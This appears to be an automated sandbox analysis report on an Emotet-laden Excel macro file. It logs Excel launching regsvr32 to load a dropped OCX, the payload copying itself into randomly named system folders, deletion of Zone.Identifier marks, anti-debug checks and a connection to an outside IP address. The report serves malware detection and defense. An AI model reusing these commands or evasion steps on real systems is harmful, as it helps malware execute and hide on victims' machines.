                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000F3A0 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetWindowsDirectoryA,GetSystemDirectoryA,_strcspn,TerminateThread,SendMessageA,ExitWindowsEx,3_2_1000F3A0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000FA35 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx,3_2_1000FA35
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000FAC4 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx,3_2_1000FAC4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000FFB0 SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx,3_2_1000FFB0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001005E SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx,3_2_1001005E
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1003D219 appears 43 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1003D578 appears 76 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10001470 appears 34 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 100171AA appears 37 times
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 1003D1E6 appears 172 times
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Documento.xlsmJump to behavior
                        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSM@19/11@1/45
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10009DB0 CreateWindowExW,CreateWindowExW,GetLastError,ShowWindow,ShowWindow,CreateWindowExA,ShowWindow,CreateWindowExW,GetLastError,ShowWindow,CreateWindowExA,ShowWindow,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,3_2_10009DB0
                        Source: Documento.xlsmVirustotal: Detection: 40%
                        Source: Documento.xlsmReversingLabs: Detection: 39%
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocxJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE233.tmpJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_0024BE5E CreateToolhelp32Snapshot,11_2_0024BE5E
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: Documento.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                        Source: Documento.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: 8833.tmp.0.drInitial sample: OLE indicators vbamacros = False
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003D2BE push ecx; ret 3_2_1003D2D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003D5BD push ecx; ret 3_2_1003D5D0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004BC5B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC5B
                        Source: xxw1.ocx.0.drStatic PE information: real checksum: 0xb1065 should be: 0xabcb9
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.drStatic PE information: real checksum: 0xb1065 should be: 0xabcb9
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file

                        Boot Survival

                        barindex
                        Drops PE files to the user root directory
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Hides that the sample has been downloaded from the Internet (zone.identifier)
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100175E3 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100175E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000B6D0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_1000B6D0
                        Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1124Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2028Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 172Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2576Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1160Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2556Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3064Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2688Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 3.0 %
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-45221
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-45163
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-44544
                        Source: regsvr32.exe, 00000008.00000002.467854306.00000000005B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: regsvr32.exe, 00000009.00000002.473212441.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003CAA2 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1003CAA2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002084E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,3_2_1002A9C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_002627C2 FindFirstFileW,11_2_002627C2
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004BC5B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC5B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001A32AC mov eax, dword ptr fs:[00000030h]3_2_001A32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_002332AC mov eax, dword ptr fs:[00000030h]4_2_002332AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_003032AC mov eax, dword ptr fs:[00000030h]5_2_003032AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_008D32AC mov eax, dword ptr fs:[00000030h]6_2_008D32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E32AC mov eax, dword ptr fs:[00000030h]9_2_001E32AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002632AC mov eax, dword ptr fs:[00000030h]10_2_002632AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_002432AC mov eax, dword ptr fs:[00000030h]11_2_002432AC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003B437 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003B437
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10008DE0 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,3_2_10008DE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10049029 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10049029
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003B437 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1003B437
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10041ACF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10041ACF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048DD7 SetUnhandledExceptionFilter,__encode_pointer,3_2_10048DD7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048DF9 __decode_pointer,SetUnhandledExceptionFilter,3_2_10048DF9

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 135.148.121.246 144Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"Jump to behavior
                        Source: Yara matchFile source: app.xml, type: SAMPLE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,3_2_1004D1C2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,3_2_1002583F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,3_2_100504E2
                        Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004C93C cpuid 3_2_1004C93C
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10048CD7 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_10048CD7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10047887 __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,3_2_10047887
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003CEE0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,3_2_1003CEE0

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Emotet
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.2.regsvr32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.200000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.regsvr32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.regsvr32.exe.1e0000.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.regsvr32.exe.1d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.regsvr32.exe.230000.1.unpack, type: UNPACKEDPE
